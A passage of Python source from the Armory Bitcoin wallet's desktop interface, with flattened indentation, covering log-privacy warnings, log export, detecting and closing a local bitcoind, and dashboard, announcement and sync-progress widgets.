<b><u><font size=3>Regular Log Files</font></u></b>
<br><br>
The regular log files do not contain any <u>security</u>-sensitive
information, but some users may consider the information to be
<u>privacy</u>-sensitive. The log files may identify some addresses
and transactions that are related to your wallets. It is always
recommended you include your log files with any request to the
Armory team, unless you are uncomfortable with the privacy
implications.
<br><br>
<b><u><font size=3>Watching-only Wallet</font></u></b>
<br><br>
A watching-only wallet is a copy of a regular wallet that does not
contain any signing keys. This allows the holder to see the balance
and transaction history of the wallet, but not spend any of the funds.
<br><br>
You may be requested to submit a watching-only copy of your wallet
to <i>Armory Technologies, Inc.</i> to make sure that there is no
risk to the security of your funds. You should not even consider
sending your
watching-only wallet unless it was specifically requested by an
Armory representative.""") % PRIVACY_URL, yesStr="&Ok")
#############################################################################
def logFilePrivacyWarning(self, wCancel=False):
return MsgBoxCustom(MSGBOX.Warning, tr('Privacy Warning'), tr("""
<b><u><font size=4>ATI Privacy Policy</font></u></b>
<br>
You should review the <a href="%s">Armory Technologies, Inc. privacy
policy</a> before sending any data to ATI servers.
<br><br>
Armory log files do not contain any <u>security</u>-sensitive
information, but some users may consider the information to be
<u>privacy</u>-sensitive. The log files may identify some addresses
and transactions that are related to your wallets.
<br><br>
<b>No signing-key data is ever written to the log file</b>.
Only enough data is there to help the Armory developers
track down bugs in the software, but it may still be considered
sensitive information to some users.
<br><br>
Please do not send the log file to the Armory developers if you
are not comfortable with the privacy implications! However, if you
do not send the log file, it may be very difficult or impossible
for us to help you with your problem.
<br><br><b><u>Advanced tip:</u></b> You can use
"<i>File</i>"\xe2\x86\x92"<i>Export Log File</i>" from the main
window to save a copy of the log file that you can manually
review."""), wCancel=wCancel, yesStr="&Ok")
#############################################################################
def saveCombinedLogFile(self, saveFile=None):
if saveFile is None:
# TODO: Interleave the C++ log and the python log.
# That could be a lot of work!
defaultFN = 'armorylog_%s.txt' % \
unixTimeToFormatStr(RightNow(),'%Y%m%d_%H%M')
saveFile = self.getFileSave(title='Export Log File', \
ffilter=['Text Files (*.txt)'], \
defaultFilename=defaultFN)
if len(unicode(saveFile)) > 0:
fout = open(saveFile, 'wb')
fout.write(getLastBytesOfFile(ARMORY_LOG_FILE, 256*1024))
fout.write(getLastBytesOfFile(ARMCPP_LOG_FILE, 256*1024))
fout.close()
LOGINFO('Log saved to %s', saveFile)
#############################################################################
def blinkTaskbar(self):
self.activateWindow()
#############################################################################
def lookForBitcoind(self):
LOGDEBUG('lookForBitcoind')
if satoshiIsAvailable():
return 'Running'
self.setSatoshiPaths()
try:
TheSDM.setupSDM(extraExeSearch=self.satoshiExeSearchPath)
except:
LOGEXCEPT('Error setting up SDM')
pass
if TheSDM.failedFindExe:
return 'StillMissing'
return 'AllGood'
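# Return values used by the caller: 'Running' (a Bitcoin-Qt/bitcoind
# process is already up), 'StillMissing' (no executable found even
# after re-searching), 'AllGood' (the SDM located the executable).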
#############################################################################
def executeModeSwitch(self):
LOGDEBUG('executeModeSwitch')
if TheSDM.getSDMState() == 'BitcoindExeMissing':
bitcoindStat = self.lookForBitcoind()
if bitcoindStat=='Running':
result = QMessageBox.warning(self, tr('Already running!'), tr("""
The Bitcoin software appears to be installed now, but it
needs to be closed for Armory to work. Would you like Armory
to close it for you?"""), QMessageBox.Yes | QMessageBox.No)
if result==QMessageBox.Yes:
self.closeExistingBitcoin()
self.startBitcoindIfNecessary()
elif bitcoindStat=='StillMissing':
QMessageBox.warning(self, tr('Still Missing'), tr("""
The Bitcoin software still appears to be missing. If you
just installed it, then please adjust your settings to point
to the installation directory."""), QMessageBox.Ok)
self.startBitcoindIfNecessary()
elif self.doAutoBitcoind and not TheSDM.isRunningBitcoind():
if satoshiIsAvailable():
result = QMessageBox.warning(self, tr('Still Running'), tr("""
Bitcoin-Qt is still running. Armory cannot start until
it is closed. Do you want Armory to close it for you?"""), \
QMessageBox.Yes | QMessageBox.No)
if result==QMessageBox.Yes:
self.closeExistingBitcoin()
self.startBitcoindIfNecessary()
else:
self.startBitcoindIfNecessary()
elif TheBDM.getState() in (BDM_OFFLINE,BDM_UNINITIALIZED):
#self.resetBdmBeforeScan()
TheBDM.goOnline()
self.switchNetworkMode(NETWORKMODE.Full)
else:
LOGERROR('ModeSwitch button pressed when it should be disabled')
time.sleep(0.3)
self.setDashboardDetails()
#############################################################################
def setupDashboard(self):
LOGDEBUG('setupDashboard')
self.lblBusy = QLabel('')
if OS_WINDOWS:
# Unfortunately, QMovie objects don't work in Windows with py2exe,
# so we had to create our own little "Busy" icon and hook it up
# to the heartbeat
self.lblBusy.setPixmap(QPixmap(':/loadicon_0.png'))
self.numHeartBeat = 0
def loadBarUpdate():
if self.lblBusy.isVisible():
self.numHeartBeat += 1
self.lblBusy.setPixmap(QPixmap(':/loadicon_%d.png' % \
(self.numHeartBeat%6)))
self.extraHeartbeatAlways.append(loadBarUpdate) # TODO - Remove this. Put the method in the handle CPP Notification event handler
else:
self.qmov = QMovie(':/busy.gif')
self.lblBusy.setMovie( self.qmov )
self.qmov.start()
self.btnModeSwitch = QPushButton('')
self.connect(self.btnModeSwitch, SIGNAL('clicked()'), \
self.executeModeSwitch)
# Will switch this to array/matrix of widgets if I get more than 2 rows
self.lblDashModeTorrent = QRichLabel('',doWrap=False)
self.lblDashModeSync = QRichLabel('',doWrap=False)
self.lblDashModeBuild = QRichLabel('',doWrap=False)
self.lblDashModeScan = QRichLabel('',doWrap=False)
self.lblDashModeTorrent.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)
self.lblDashModeSync.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.lblDashModeBuild.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.lblDashModeScan.setAlignment( Qt.AlignLeft | Qt.AlignVCenter)
self.barProgressTorrent = QProgressBar(self)
self.barProgressSync = QProgressBar(self)
self.barProgressBuild = QProgressBar(self)
self.barProgressScan = QProgressBar(self)
self.barProgressTorrent.setRange(0,100)
self.barProgressSync.setRange(0,100)
self.barProgressScan.setRange(0,100)
self.lblTorrentStats = QRichLabel('', hAlign=Qt.AlignHCenter)
twid = relaxedSizeStr(self,'99 seconds')[0]
self.lblTimeLeftTorrent = QRichLabel('')
self.lblTimeLeftSync = QRichLabel('')
self.lblTimeLeftBuild = QRichLabel('')
self.lblTimeLeftScan = QRichLabel('')
self.lblTimeLeftSync.setMinimumWidth(twid)
self.lblTimeLeftScan.setMinimumWidth(twid)
self.lblStatsTorrent = QRichLabel('')
layoutDashMode = QGridLayout()
layoutDashMode.addWidget(self.lblDashModeTorrent, 0,0)
layoutDashMode.addWidget(self.barProgressTorrent, 0,1)
layoutDashMode.addWidget(self.lblTimeLeftTorrent, 0,2)
layoutDashMode.addWidget(self.lblTorrentStats, 1,0)
layoutDashMode.addWidget(self.lblDashModeSync, 2,0)
layoutDashMode.addWidget(self.barProgressSync, 2,1)
layoutDashMode.addWidget(self.lblTimeLeftSync, 2,2)
layoutDashMode.addWidget(self.lblDashModeBuild, 3,0)
layoutDashMode.addWidget(self.barProgressBuild, 3,1)
layoutDashMode.addWidget(self.lblTimeLeftBuild, 3,2)
layoutDashMode.addWidget(self.lblDashModeScan, 4,0)
layoutDashMode.addWidget(self.barProgressScan, 4,1)
layoutDashMode.addWidget(self.lblTimeLeftScan, 4,2)
layoutDashMode.addWidget(self.lblBusy, 0,3, 5,1)
layoutDashMode.addWidget(self.btnModeSwitch, 0,3, 5,1)
self.frmDashModeSub = QFrame()
self.frmDashModeSub.setFrameStyle(STYLE_SUNKEN)
self.frmDashModeSub.setLayout(layoutDashMode)
self.frmDashMode = makeHorizFrame(['Stretch', \
self.frmDashModeSub, \
'Stretch'])
self.lblDashDescr1 = QRichLabel('')
self.lblDashDescr2 = QRichLabel('')
for lbl in [self.lblDashDescr1, self.lblDashDescr2]:
# One textbox above buttons, one below
lbl.setStyleSheet('padding: 5px')
qpal = lbl.palette()
qpal.setColor(QPalette.Base, Colors.Background)
lbl.setPalette(qpal)
lbl.setOpenExternalLinks(True)
# Set up an array of buttons in the middle of the dashboard, to be used
# to help the user install bitcoind.
self.lblDashBtnDescr = QRichLabel('')
self.lblDashBtnDescr.setOpenExternalLinks(True)
BTN,LBL,TTIP = range(3)
self.dashBtns = [[None]*3 for i in range(5)]
self.dashBtns[DASHBTNS.Close ][BTN] = QPushButton('Close Bitcoin Process')
self.dashBtns[DASHBTNS.Install ][BTN] = QPushButton('Download Bitcoin')
self.dashBtns[DASHBTNS.Browse ][BTN] = QPushButton('Open www.bitcoin.org')
self.dashBtns[DASHBTNS.Instruct][BTN] = QPushButton('Installation Instructions')
self.dashBtns[DASHBTNS.Settings][BTN] = QPushButton('Change Settings')
# The "Now shutting down" frame
self.lblShuttingDown = QRichLabel('', doWrap=False)
self.lblShuttingDown.setText(tr('Preparing to shut down...'), \
size=4, bold=True, color='Foreground')
self.lblShuttingDown.setAlignment(Qt.AlignCenter | Qt.AlignVCenter)
layoutDashExit = QGridLayout()
layoutDashExit.addWidget(self.lblShuttingDown, 0,0, 0, 1)
self.frmDashSubExit = QFrame()
self.frmDashSubExit.setFrameStyle(STYLE_SUNKEN)
self.frmDashSubExit.setLayout(layoutDashExit)
self.frmDashSubExit = makeHorizFrame(['Stretch', \
self.frmDashSubExit, \
'Stretch'])
#####
def openBitcoinOrg():
webbrowser.open('http://www.bitcoin.org/en/download')
#####
def openInstruct():
if OS_WINDOWS:
webbrowser.open('https://www.bitcoinarmory.com/install-windows/')
elif OS_LINUX:
webbrowser.open('https://www.bitcoinarmory.com/install-linux/')
elif OS_MACOSX:
webbrowser.open('https://www.bitcoinarmory.com/install-macosx/')
self.connect(self.dashBtns[DASHBTNS.Close][BTN], SIGNAL('clicked()'), \
self.closeExistingBitcoin)
self.connect(self.dashBtns[DASHBTNS.Install][BTN], SIGNAL('clicked()'), \
self.openDLSatoshi)
self.connect(self.dashBtns[DASHBTNS.Browse][BTN], SIGNAL('clicked()'), \
openBitcoinOrg)
self.connect(self.dashBtns[DASHBTNS.Settings][BTN], SIGNAL('clicked()'), \
self.openSettings)
#self.connect(self.dashBtns[DASHBTNS.Instruct][BTN], SIGNAL('clicked()'), \
#self.openInstructWindow)
self.dashBtns[DASHBTNS.Close][LBL] = QRichLabel( \
'Stop existing Bitcoin processes so that Armory can open its own')
self.dashBtns[DASHBTNS.Browse][LBL] = QRichLabel( \
'Open browser to Bitcoin webpage to download and install Bitcoin software')
self.dashBtns[DASHBTNS.Instruct][LBL] = QRichLabel( \
'Instructions for manually installing Bitcoin for your operating system')
self.dashBtns[DASHBTNS.Settings][LBL] = QRichLabel( \
'Open Armory settings window to change Bitcoin software management')
self.dashBtns[DASHBTNS.Browse][TTIP] = self.createToolTipWidget( \
'Will open your default browser to http://www.bitcoin.org where you can '
'download the latest version of Bitcoin-Qt, and get other information '
'and links about Bitcoin, in general.')
self.dashBtns[DASHBTNS.Instruct][TTIP] = self.createToolTipWidget( \
'Instructions are specific to your operating system and include '
'information to help you verify you are installing the correct software')
self.dashBtns[DASHBTNS.Settings][TTIP] = self.createToolTipWidget(
'Change Bitcoin-Qt/bitcoind management settings or point Armory to '
'a non-standard Bitcoin installation')
self.dashBtns[DASHBTNS.Close][TTIP] = self.createToolTipWidget( \
'Armory has detected a running Bitcoin-Qt or bitcoind instance and '
'will force it to exit')
self.dashBtns[DASHBTNS.Install][BTN].setEnabled(False)
self.dashBtns[DASHBTNS.Install][LBL] = QRichLabel('')
self.dashBtns[DASHBTNS.Install][LBL].setText( \
'This option is not available yet!', color='DisableFG')
self.dashBtns[DASHBTNS.Install][TTIP] = QRichLabel('') # disabled
if OS_WINDOWS:
self.dashBtns[DASHBTNS.Install][BTN].setEnabled(True)
self.dashBtns[DASHBTNS.Install][LBL] = QRichLabel('')
self.dashBtns[DASHBTNS.Install][LBL].setText( \
'Securely download Bitcoin software for Windows %s' % OS_VARIANT[0])
self.dashBtns[DASHBTNS.Install][TTIP] = self.createToolTipWidget( \
'The downloaded files are cryptographically verified. '
'Using this option will start the installer; you will '
'have to click through it to complete installation.')
#self.lblDashInstallForMe = QRichLabel( \
#'Armory will download, verify, and start the Bitcoin installer for you')
#self.ttipInstallForMe = self.createToolTipWidget( \
#'Armory will download the latest version of the Bitcoin software '
#'for Windows and verify its digital signatures. You will have to '
#'click through the installation options.<u></u>')
elif OS_LINUX:
# Only display the install button if using a debian-based distro
dist = platform.linux_distribution()
if dist[0] in ['Ubuntu','LinuxMint'] or 'debian' in dist:
self.dashBtns[DASHBTNS.Install][BTN].setEnabled(True)
self.dashBtns[DASHBTNS.Install][LBL] = QRichLabel( tr("""
Download and Install Bitcoin Core for Ubuntu/Debian"""))
self.dashBtns[DASHBTNS.Install][TTIP] = self.createToolTipWidget( tr("""
Will download the Bitcoin software and cryptographically verify it"""))
elif OS_MACOSX:
pass
else:
LOGERROR('Unrecognized OS!')
self.frmDashMgmtButtons = QFrame()
self.frmDashMgmtButtons.setFrameStyle(STYLE_SUNKEN)
layoutButtons = QGridLayout()
layoutButtons.addWidget(self.lblDashBtnDescr, 0,0, 1,3)
for r in range(5):
for c in range(3):
if c==LBL:
wMin = tightSizeNChar(self, 50)[0]
self.dashBtns[r][c].setMinimumWidth(wMin)
layoutButtons.addWidget(self.dashBtns[r][c], r+1,c)
self.frmDashMgmtButtons.setLayout(layoutButtons)
self.frmDashMidButtons = makeHorizFrame(['Stretch', \
self.frmDashMgmtButtons,
'Stretch'])
dashLayout = QVBoxLayout()
dashLayout.addWidget(self.frmDashSubExit)
dashLayout.addWidget(self.frmDashMode)
dashLayout.addWidget(self.lblDashDescr1)
dashLayout.addWidget(self.frmDashMidButtons )
dashLayout.addWidget(self.lblDashDescr2)
frmInner = QFrame()
frmInner.setLayout(dashLayout)
self.dashScrollArea = QScrollArea()
self.dashScrollArea.setWidgetResizable(True)
self.dashScrollArea.setWidget(frmInner)
scrollLayout = QVBoxLayout()
scrollLayout.addWidget(self.dashScrollArea)
self.tabDashboard.setLayout(scrollLayout)
self.frmDashSubExit.setVisible(False)
#############################################################################
def setupAnnounceTab(self):
self.lblAlertStr = QRichLabel(tr("""
<font size=4><b>Announcements and alerts from <i>Armory Technologies,
Inc.</i></b></font>"""), doWrap=False, hAlign=Qt.AlignHCenter)
def checkUpd():
lastUpdate = self.announceFetcher.getLastSuccessfulFetchTime()
self.explicitCheckAnnouncements(5)
lastUpdate2 = self.announceFetcher.getLastSuccessfulFetchTime()
if lastUpdate==lastUpdate2:
QMessageBox.warning(self, tr('Not Available'), tr("""
Could not access the <font color="%s"><b>Armory
Technologies, Inc.</b></font> announcement feeder.
Try again in a couple of minutes.""") % \
htmlColor('TextGreen'), QMessageBox.Ok)
else:
QMessageBox.warning(self, tr('Update'), tr("""
Announcements are now up to date!"""), QMessageBox.Ok)
self.lblLastUpdated = QRichLabel('', doWrap=False)
self.btnCheckForUpdates = QPushButton(tr('Check for Updates'))
self.connect(self.btnCheckForUpdates, SIGNAL(CLICKED), checkUpd)
frmLastUpdate = makeHorizFrame(['Stretch', \
self.lblLastUpdated, \
self.btnCheckForUpdates, \
'Stretch'])
self.icoArmorySWVersion = QLabel('')
self.lblArmorySWVersion = QRichLabel(tr("""
No version information is available"""), doWrap=False)
self.icoSatoshiSWVersion = QLabel('')
self.lblSatoshiSWVersion = QRichLabel('', doWrap=False)
self.btnSecureDLArmory = QPushButton(tr('Secure Downloader'))
self.btnSecureDLSatoshi = QPushButton(tr('Secure Downloader'))
self.btnSecureDLArmory.setVisible(False)
self.btnSecureDLSatoshi.setVisible(False)
self.connect(self.btnSecureDLArmory, SIGNAL(CLICKED), self.openDLArmory)
self.connect(self.btnSecureDLSatoshi, SIGNAL(CLICKED), self.openDLSatoshi)
frmVersions = QFrame()
layoutVersions = QGridLayout()
layoutVersions.addWidget(self.icoArmorySWVersion, 0,0)
layoutVersions.addWidget(self.lblArmorySWVersion, 0,1)
layoutVersions.addWidget(self.btnSecureDLArmory, 0,2)
layoutVersions.addWidget(self.icoSatoshiSWVersion, 1,0)
layoutVersions.addWidget(self.lblSatoshiSWVersion, 1,1)
layoutVersions.addWidget(self.btnSecureDLSatoshi, 1,2)
layoutVersions.setColumnStretch(0,0)
layoutVersions.setColumnStretch(1,1)
layoutVersions.setColumnStretch(2,0)
frmVersions.setLayout(layoutVersions)
frmVersions.setFrameStyle(STYLE_RAISED)
lblVerHeader = QRichLabel(tr("""<font size=4><b>
Software Version Updates:</b></font>"""), doWrap=False, \
hAlign=Qt.AlignHCenter)
lblTableHeader = QRichLabel(tr("""<font size=4><b>
All Available Notifications:</b></font>"""), doWrap=False, \
hAlign=Qt.AlignHCenter)
# We need to generate popups when a widget is clicked, and be able to
# change that particular widget's target when the table is updated.
# Create one of these DlgGen objects for each of the 10 rows; simply
# update its nid and notifyMap when the table is updated.
class DlgGen():
def setParams(self, parent, nid, notifyMap):
self.parent = parent
self.nid = nid
self.notifyMap = notifyMap
def __call__(self):
return DlgNotificationWithDNAA(self.parent, self.parent, \
self.nid, self.notifyMap, False).exec_()
self.announceTableWidgets = \
[[QLabel(''), QRichLabel(''), QLabelButton('+'), DlgGen()] \
for i in range(10)]
layoutTable = QGridLayout()
for i in range(10):
for j in range(3):
layoutTable.addWidget(self.announceTableWidgets[i][j], i,j)
self.connect(self.announceTableWidgets[i][2], SIGNAL(CLICKED), \
self.announceTableWidgets[i][3])
layoutTable.setColumnStretch(0,0)
layoutTable.setColumnStretch(1,1)
layoutTable.setColumnStretch(2,0)
frmTable = QFrame()
frmTable.setLayout(layoutTable)
frmTable.setFrameStyle(STYLE_SUNKEN)
self.updateAnnounceTable()
frmEverything = makeVertFrame( [ self.lblAlertStr,
frmLastUpdate,
'Space(30)',
lblTableHeader,
frmTable,
'Space(30)',
lblVerHeader,
frmVersions,
'Stretch'])
frmEverything.setMinimumWidth(300)
frmEverything.setMaximumWidth(800)
frmFinal = makeHorizFrame(['Stretch', frmEverything, 'Stretch'])
self.announceScrollArea = QScrollArea()
self.announceScrollArea.setWidgetResizable(True)
self.announceScrollArea.setWidget(frmFinal)
scrollLayout = QVBoxLayout()
scrollLayout.addWidget(self.announceScrollArea)
self.tabAnnounce.setLayout(scrollLayout)
self.announceIsSetup = True
#############################################################################
def openDownloaderAll(self):
dl,cl = self.getDownloaderData()
if dl is not None and cl is not None:
UpgradeDownloaderDialog(self, self, None, dl, cl).exec_()
#############################################################################
def openDLArmory(self):
dl,cl = self.getDownloaderData()
if dl is not None and cl is not None:
UpgradeDownloaderDialog(self, self, 'Armory', dl, cl).exec_()
#############################################################################
def openDLSatoshi(self):
dl,cl = self.getDownloaderData()
if dl is not None and cl is not None:
UpgradeDownloaderDialog(self, self, 'Satoshi', dl, cl).exec_()
#############################################################################
def getDownloaderData(self):
dl = self.announceFetcher.getAnnounceFile('downloads')
cl = self.announceFetcher.getAnnounceFile('changelog')
dlObj = downloadLinkParser().parseDownloadList(dl)
clObj = changelogParser().parseChangelogText(cl)
if dlObj is None or clObj is None:
QMessageBox.warning(self, tr('No Data'), tr("""
The secure downloader has not received any download
data to display. Either the <font color="%s"><b>Armory
Technologies, Inc.</b></font> announcement feeder is
down, or this computer cannot access the server.""") % \
htmlColor('TextGreen'), QMessageBox.Ok)
return None,None
lastUpdate = self.announceFetcher.getLastSuccessfulFetchTime()
sinceLastUpd = RightNow() - lastUpdate
if lastUpdate < RightNow()-1*WEEK:
QMessageBox.warning(self, tr('Old Data'), tr("""
The last update retrieved from the <font color="%(color)s"><b>Armory
Technologies, Inc.</b></font> announcement feeder was <b>%(time)s</b>
ago. The following downloads may not be the latest
available.""") % { 'color' : htmlColor("TextGreen"), \
'time' : secondsToHumanTime(sinceLastUpd)}, QMessageBox.Ok)
dl = self.announceFetcher.getAnnounceFile('downloads')
cl = self.announceFetcher.getAnnounceFile('changelog')
return dl,cl
#############################################################################
def updateAnnounceTab(self, *args):
if not self.announceIsSetup:
return
iconArmory = ':/armory_icon_32x32.png'
iconSatoshi = ':/bitcoinlogo.png'
iconInfoFile = ':/MsgBox_info48.png'
iconGoodFile = ':/MsgBox_good48.png'
iconWarnFile = ':/MsgBox_warning48.png'
iconCritFile = ':/MsgBox_critical24.png'
lastUpdate = self.announceFetcher.getLastSuccessfulFetchTime()
noAnnounce = (lastUpdate == 0)
if noAnnounce:
self.lblLastUpdated.setText(tr("No announcement data was found!"))
self.btnSecureDLArmory.setVisible(False)
self.icoArmorySWVersion.setVisible(True)
self.lblArmorySWVersion.setText(tr(""" You are running Armory
version %s""") % getVersionString(BTCARMORY_VERSION))
else:
updTimeStr = unixTimeToFormatStr(lastUpdate)
self.lblLastUpdated.setText(tr("<u>Last Updated</u>: %s") % updTimeStr)
verStrToInt = lambda s: getVersionInt(readVersionString(s))
# Notify of Armory updates
self.icoArmorySWVersion.setPixmap(QPixmap(iconArmory).scaled(24,24))
self.icoSatoshiSWVersion.setPixmap(QPixmap(iconSatoshi).scaled(24,24))
try:
armCurrent = verStrToInt(self.armoryVersions[0])
armLatest = verStrToInt(self.armoryVersions[1])
if armCurrent >= armLatest:
dispIcon = QPixmap(iconArmory).scaled(24,24)
self.icoArmorySWVersion.setPixmap(dispIcon)
self.btnSecureDLArmory.setVisible(False)
self.lblArmorySWVersion.setText(tr(
"You are using the latest version of Armory (%s)"
% self.armoryVersions[0]))
else:
dispIcon = QPixmap(iconWarnFile).scaled(24,24)
self.icoArmorySWVersion.setPixmap(dispIcon)
self.btnSecureDLArmory.setVisible(True)
self.lblArmorySWVersion.setText(tr("""
<b>There is a newer version of Armory available!</b>"""))
self.icoArmorySWVersion.setVisible(True)
except:
self.btnSecureDLArmory.setVisible(False)
self.lblArmorySWVersion.setText(tr(""" You are running Armory
version %s""") % getVersionString(BTCARMORY_VERSION))
try:
satCurrStr,satLastStr = self.satoshiVersions
satCurrent = verStrToInt(satCurrStr) if satCurrStr else 0
satLatest = verStrToInt(satLastStr) if satLastStr else 0
# Show CoreBTC updates
if satCurrent and satLatest:
if satCurrent >= satLatest:
dispIcon = QPixmap(iconGoodFile).scaled(24,24)
self.btnSecureDLSatoshi.setVisible(False)
self.icoSatoshiSWVersion.setPixmap(dispIcon)
self.lblSatoshiSWVersion.setText(tr(""" You are using
the latest version of core Bitcoin (%s)""") % satCurrStr)
else:
dispIcon = QPixmap(iconWarnFile).scaled(24,24)
self.btnSecureDLSatoshi.setVisible(True)
self.icoSatoshiSWVersion.setPixmap(dispIcon)
self.lblSatoshiSWVersion.setText(tr("""
<b>There is a newer version of the core Bitcoin software
available!</b>"""))
elif satCurrent:
# satLatest is not available
dispIcon = QPixmap(iconGoodFile).scaled(24,24)
self.btnSecureDLSatoshi.setVisible(False)
self.icoSatoshiSWVersion.setPixmap(dispIcon)
self.lblSatoshiSWVersion.setText(tr(""" You are using
core Bitcoin version %s""") % satCurrStr)
elif satLatest:
# only satLatest is avail (maybe offline)
dispIcon = QPixmap(iconSatoshi).scaled(24,24)
self.btnSecureDLSatoshi.setVisible(True)
self.icoSatoshiSWVersion.setPixmap(dispIcon)
self.lblSatoshiSWVersion.setText(tr("""Core Bitcoin version
%s is available.""") % satLastStr)
else:
# neither version is available
dispIcon = QPixmap(iconSatoshi).scaled(24,24)
self.btnSecureDLSatoshi.setVisible(False)
self.icoSatoshiSWVersion.setPixmap(dispIcon)
self.lblSatoshiSWVersion.setText(tr("""No version information
is available for core Bitcoin""") )
#self.btnSecureDLSatoshi.setVisible(False)
#if self.satoshiVersions[0]:
#self.lblSatoshiSWVersion.setText(tr(""" You are running
#core Bitcoin software version %s""") % self.satoshiVersions[0])
#else:
#self.lblSatoshiSWVersion.setText(tr("""No information is
#available for the core Bitcoin software"""))
except:
LOGEXCEPT('Failed to process satoshi versions')
self.updateAnnounceTable()
#############################################################################
def updateAnnounceTable(self):
# Default: Make everything non-visible except first row, middle column
for i in range(10):
for j in range(3):
self.announceTableWidgets[i][j].setVisible(i==0 and j==1)
if len(self.almostFullNotificationList)==0:
self.announceTableWidgets[0][1].setText(tr("""
There are no announcements or alerts to display"""))
return
alertsForSorting = []
for nid,nmap in self.almostFullNotificationList.iteritems():
alertsForSorting.append([nid, int(nmap['PRIORITY'])])
sortedAlerts = sorted(alertsForSorting, key=lambda a: -a[1])[:10]
i = 0
for nid,priority in sortedAlerts:
if priority>=4096:
pixm = QPixmap(':/MsgBox_critical64.png')
elif priority>=3072:
pixm = QPixmap(':/MsgBox_warning48.png')
elif priority>=2048:
pixm = QPixmap(':/MsgBox_info48.png')
else:
pixm = QPixmap(':/MsgBox_info48.png')
shortDescr = self.almostFullNotificationList[nid]['SHORTDESCR']
if priority>=4096:
shortDescr = '<font color="%s">' + shortDescr + '</font>'
shortDescr = shortDescr % htmlColor('TextWarn')
self.announceTableWidgets[i][0].setPixmap(pixm.scaled(24,24))
self.announceTableWidgets[i][1].setText(shortDescr)
self.announceTableWidgets[i][2].setVisible(True)
self.announceTableWidgets[i][3].setParams(self, nid, \
self.almostFullNotificationList[nid])
for j in range(3):
self.announceTableWidgets[i][j].setVisible(True)
i += 1
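# Priority bands used above: >=4096 is critical, >=3072 is a warning,
# and anything below that is displayed as informational.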
#############################################################################
def explicitCheckAnnouncements(self, waitTime=3):
self.announceFetcher.fetchRightNow(waitTime)
self.processAnnounceData()
self.updateAnnounceTab()
#############################################################################
def closeExistingBitcoin(self):
for proc in psutil.process_iter():
try:
if proc.name().lower() in ['bitcoind.exe','bitcoin-qt.exe',\
'bitcoind','bitcoin-qt']:
killProcess(proc.pid)
time.sleep(2)
return
# If the block above raises access denied or anything else, just skip it
except:
pass
# If got here, never found it
QMessageBox.warning(self, 'Not Found', \
'Attempted to kill the running Bitcoin-Qt/bitcoind instance, '
'but it was not found. ', QMessageBox.Ok)
#############################################################################
def getPercentageFinished(self, maxblk, lastblk):
curr = EstimateCumulativeBlockchainSize(lastblk)
maxb = EstimateCumulativeBlockchainSize(maxblk)
return float(curr)/float(maxb)
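# Illustrative numbers only: if the estimated cumulative chain size at
# the last-processed block were 20 GB and the estimate at the top block
# were 25 GB, this would return 20.0/25.0 = 0.8, i.e. 80% finished.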
#############################################################################
def showShuttingDownMessage(self):
self.isShuttingDown = True
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
self.frmDashSubExit.setVisible(True)
self.frmDashMode.setVisible(False)
self.lblDashDescr1.setVisible(False)
self.frmDashMidButtons.setVisible(False)
self.lblDashDescr2.setVisible(False)
#############################################################################
def updateSyncProgress(self):
if self.isShuttingDown:
return
if TheTDM.getTDMState()=='Downloading':
dlSpeed = TheTDM.getLastStats('downRate')
timeEst = TheTDM.getLastStats('timeEst')
fracDone = TheTDM.getLastStats('fracDone')
numSeeds = TheTDM.getLastStats('numSeeds')
numPeers = TheTDM.getLastStats('numPeers')
self.barProgressTorrent.setVisible(True)
self.lblDashModeTorrent.setVisible(True)
self.lblTimeLeftTorrent.setVisible(True)
self.lblTorrentStats.setVisible(True)
self.barProgressTorrent.setFormat('%p%')
self.lblDashModeSync.setVisible(True)
self.barProgressSync.setVisible(True)
self.barProgressSync.setValue(0)
self.lblTimeLeftSync.setVisible(True)
self.barProgressSync.setFormat('')
self.lblDashModeBuild.setVisible(True)
self.barProgressBuild.setVisible(True)
self.barProgressBuild.setValue(0)
self.lblTimeLeftBuild.setVisible(True)
self.barProgressBuild.setFormat('')
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.barProgressScan.setValue(0)
self.lblTimeLeftScan.setVisible(True)
self.barProgressScan.setFormat('')
if not numSeeds:
self.barProgressTorrent.setValue(0)
self.lblTimeLeftTorrent.setText('')
self.lblTorrentStats.setText('')
self.lblDashModeTorrent.setText(tr('Initializing Torrent Engine'), \
size=4, bold=True, color='Foreground')
self.lblTorrentStats.setVisible(False)
else:
self.lblDashModeTorrent.setText(tr('Downloading via Armory CDN'), \
size=4, bold=True, color='Foreground')
if fracDone:
self.barProgressTorrent.setValue(int(99.9*fracDone))
if timeEst:
self.lblTimeLeftTorrent.setText(secondsToHumanTime(timeEst))
self.lblTorrentStats.setText(tr("""
Bootstrap Torrent: %(sec)s/sec from %(peers)d peers""") % \
{'sec' : bytesToHumanSize(dlSpeed), 'peers' : numSeeds+numPeers})
self.lblTorrentStats.setVisible(True)
elif TheBDM.getState()==BDM_SCANNING:
self.barProgressTorrent.setVisible(TheTDM.isStarted())
self.lblDashModeTorrent.setVisible(TheTDM.isStarted())
self.barProgressTorrent.setValue(100)
self.lblTimeLeftTorrent.setVisible(False)
self.lblTorrentStats.setVisible(False)
self.barProgressTorrent.setFormat('')
self.lblDashModeSync.setVisible(self.doAutoBitcoind)
self.barProgressSync.setVisible(self.doAutoBitcoind)
self.barProgressSync.setValue(100)
self.lblTimeLeftSync.setVisible(False)
self.barProgressSync.setFormat('')
self.lblDashModeBuild.setVisible(True)
self.barProgressBuild.setVisible(True)
self.lblTimeLeftBuild.setVisible(True)
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(True)
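# predictLoadTime() reports the current DB phase, the fraction complete
# (0-1), the estimated seconds remaining, and a raw numeric progress value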
phase,pct,tleft,numericProgress = TheBDM.predictLoadTime()
if phase==Cpp.BDMPhase_DBHeaders:
self.lblDashModeBuild.setText( tr('Loading Database Headers'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_OrganizingChain:
self.lblDashModeBuild.setText( tr('Organizing Blockchain'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('')
